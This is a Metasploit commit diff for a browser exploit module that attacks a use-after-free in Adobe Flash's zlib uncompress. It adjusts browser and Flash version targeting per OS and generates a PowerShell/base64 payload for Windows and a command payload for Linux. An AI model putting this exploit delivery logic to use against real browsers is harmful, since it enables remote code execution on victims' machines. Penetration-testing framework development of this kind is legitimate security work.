Use all the BES power

2015-05-21 14:06:41 -05:00 · 2015-05-21 14:06:41 -05:00 · b9f9647ab1
parent 4a5d2d1d24
commit b9f9647ab1
1 changed files with 22 additions and 6 deletions
--- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
+++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb
@ -45,16 +45,31 @@ class Metasploit3 < Msf::Exploit::Remote
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
+          :arch    => ARCH_X86,
          :os_name => lambda do |os|
              os =~ OperatingSystems::Match::LINUX ||
              os =~ OperatingSystems::Match::WINDOWS_7
            end,
-          :ua_name => lambda { |ua| [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua) },
+          :ua_name => lambda do |ua|
+            case target.name
+            when 'Windows'
+              return true if ua == Msf::HttpClients::IE
+            when 'Linux'
+              return true if ua == Msf::HttpClients::FF
+            end
+
+            false
+          end,
          :flash   => lambda do |ver|
-              (ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')) ||
-                (ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438'))
-            end,
-          :arch    => ARCH_X86
+            case target.name
+            when 'Windows'
+              return true if ver =~ /^16\./ && Gem::Version.new(ver) <= Gem::Version.new('16.0.0.287')
+            when 'Linux'
+              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.438')
+            end
+
+            false
+          end
        },
      'Targets'             =>
        [
@ -97,13 +112,14 @@ class Metasploit3 < Msf::Exploit::Remote

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
-    target_payload = get_payload(cli, target_info)

    if target.name =~ /Windows/
+      target_payload = get_payload(cli, target_info)
      psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
      b64_payload = Rex::Text.encode_base64(psh_payload)
      platform_id = 'win'
    elsif target.name =~ /Linux/
+      target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD))
      b64_payload = Rex::Text.encode_base64(target_payload)
      platform_id = 'linux'
    end